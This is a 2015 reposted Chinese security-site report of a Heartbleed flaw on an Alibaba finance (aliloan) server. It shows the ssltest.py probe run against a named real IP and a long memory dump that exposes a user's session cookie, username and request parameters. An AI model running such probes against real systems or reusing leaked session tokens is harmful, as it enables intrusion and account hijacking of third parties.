欢迎来到 黑吧安全网 聚焦网络安全前沿资讯,精华内容,交流技术心得!

阿里巴巴金融某服务器存在心脏滴血漏洞

来源:本站整理 作者:佚名 时间:2015-07-21 TAG: 我要投稿


https://42.156.162.10 打开跳转到了 https://sso.aliloan.com通过内存泄露得知此IP指向域名为https://ecdcc.aliloan.com未深入..
ssltest.py 42.156.162.10
Connecting...42.156.162.10
Sending Client Hello...42.156.162.10
Waiting for Server Hello...
 ... received message: type = 22, ver = 0302, length = 66
 ... received message: type = 22, ver = 0302, length = 4105
 ... received message: type = 22, ver = 0302, length = 331
 ... received message: type = 22, ver = 0302, length = 4
Sending heartbeat request...
 ... received message: type = 24, ver = 0302, length = 16384
Received heartbeat response:
  0000: 02 40 00 D8 03 02 53 43 5B 90 9D 9B 72 0B BC 0C  .@....SC[...r...
  0010: BC 2B 92 A8 48 97 CF BD 39 04 CC 16 0A 85 03 90  .+..H...9.......
  0020: 9F 77 04 33 D4 DE 00 00 66 C0 14 C0 0A C0 22 C0  .w.3....f.....".
  0030: 21 00 39 00 38 00 88 00 87 C0 0F C0 05 00 35 00  !.9.8.........5.
  0040: 84 C0 12 C0 08 C0 1C C0 1B 00 16 00 13 C0 0D C0  ................
  0050: 03 00 0A C0 13 C0 09 C0 1F C0 1E 00 33 00 32 00  ............3.2.
  0060: 9A 00 99 00 45 00 44 C0 0E C0 04 00 2F 00 96 00  ....E.D...../...
  0070: 41 C0 11 C0 07 C0 0C C0 02 00 05 00 04 00 15 00  A...............
  0080: 12 00 09 00 14 00 11 00 08 00 06 00 03 00 FF 01  ................
  0090: 00 00 49 00 0B 00 04 03 00 01 02 00 0A 00 34 00  ..I...........4.
  00a0: 32 00 0E 00 0D 00 19 00 0B 00 0C 00 18 00 09 00  2...............
  00b0: 0A 00 16 00 17 00 08 00 06 00 07 00 14 00 15 00  ................
  00c0: 04 00 05 00 12 00 13 00 01 00 02 00 03 00 0F 00  ................
  00d0: 10 00 11 00 23 00 00 00 0F 00 01 01 2F 35 2E 30  ....#......./5.0
  00e0: 20 28 57 69 6E 64 6F 77 73 20 4E 54 20 36 2E 31   (Windows NT 6.1
  00f0: 3B 20 57 4F 57 36 34 29 20 41 70 70 6C 65 57 65  ; WOW64) AppleWe
  0100: 62 4B 69 74 2F 35 33 37 2E 33 36 20 28 4B 48 54  bKit/537.36 (KHT
  0110: 4D 4C 2C 20 6C 69 6B 65 20 47 65 63 6B 6F 29 20  ML, like Gecko)
  0120: 43 68 72 6F 6D 65 2F 33 32 2E 30 2E 31 37 30 30  Chrome/32.0.1700
  0130: 2E 31 30 37 20 53 61 66 61 72 69 2F 35 33 37 2E  .107 Safari/537.
  0140: 33 36 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65  36..Content-Type
  0150: 3A 20 61 70 70 6C 69 63 61 74 69 6F 6E 2F 78 2D  : application/x-
  0160: 77 77 77 2D 66 6F 72 6D 2D 75 72 6C 65 6E 63 6F  www-form-urlenco
  0170: 64 65 64 3B 20 63 68 61 72 73 65 74 3D 55 54 46  ded; charset=UTF
  0180: 2D 38 0D 0A 41 63 63 65 70 74 2D 45 6E 63 6F 64  -8..Accept-Encod
  0190: 69 6E 67 3A 20 67 7A 69 70 2C 64 65 66 6C 61 74  ing: gzip,deflat
  01a0: 65 2C 73 64 63 68 0D 0A 41 63 63 65 70 74 2D 4C  e,sdch..Accept-L
  01b0: 61 6E 67 75 61 67 65 3A 20 7A 68 2D 43 4E 2C 7A  anguage: zh-CN,z
  01c0: 68 3B 71 3D 30 2E 38 0D 0A 43 6F 6F 6B 69 65 3A  h;q=0.8..Cookie:
  01d0: 20 4A 53 45 53 53 49 4F 4E 49 44 3D 32 31 35 34   JSESSIONID=2154
  01e0: 35 34 43 35 42 44 41 34 30 33 34 43 37 36 41 38  54C5BDA4034C76A8
  01f0: 36 34 46 30 37 44 30 42 41 45 31 30 0D 0A 0D 0A  64F07D0BAE10....
  0200: 75 73 65 72 3D 63 65 6E 63 65 6E 26 6F 72 67 43  user=cencen&orgC
  0210: 6F 64 65 3D 46 35 31 16 D7 0D 47 93 48 68 D4 D4  ode=F51...G.Hh..
  0220: 30 FA B3 96 AC CF BD 61 6C 6C 62 61 63 6B 3D 6A  0......allback=j
  0230: 51 75 65 72 79 31 38 31 30 37 34 30 39 37 38 35  Query18107409785
  0240: 36 32 35 30 35 39 31 35 38 5F 31 34 33 33 34 30  625059158_143340
  0250: 31 30 31 33 33 37 31 26 5F 3D 31 34 33 33 34 30  1013371&_=143340
  0260: 31 30 31 33 34 30 32 20 48 54 54 50 2F 31 2E 31  1013402 HTTP/1.1
  0270: 0D 0A 48 6F 73 74 3A 20 65 63 64 63 63 2E 61 6C  ..Host: ecdcc.al
  0280: 69 6C 6F 61 6E 2E 63 6F 6D 0D 0A 43 6F 6E 6E 65  iloan.com..Conne
  0290: 63 74 69 6F 6E 3A 20 6B 65 65 70 2D 61 6C 69 76  ction: keep-aliv
  02a0: 65 0D 0A 41 63 63 65 70 74 3A 20 74 65 78 74 2F  e..Accept: text/
  02b0: 6A 61 76 61 73 63 72 69 70 74 2C 20 61 70 70 6C  javascript, appl
  02c0: 69 63 61 74 69 6F 6E 2F 6A 61 76 61 73 63 72 69  ication/javascri
  02d0: 70 74 2C 20 61 70 70 6C 69 63 61 74 69 6F 6E 2F  pt, application/
  02e0: 65 63 6D 61 73 63 72 69 70 74 2C 20 61 70 70 6C  ecmascript, appl
  02f0: 69 63 61 74 69 6F 6E 2F 78 2D 65 63 6D 61 73 63  ication/x-ecmasc

[1] [2] [3] [4] [5] [6] [7] [8] [9] [10] [11] [12] [13] [14] [15] [16]  下一页

【声明】:黑吧安全网(http://www.myhack58.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们,联系邮箱admin@myhack58.com,我们会在最短的时间内进行处理。
  • 最新更新
    • 相关阅读
      • 本类热门
        • 最近下载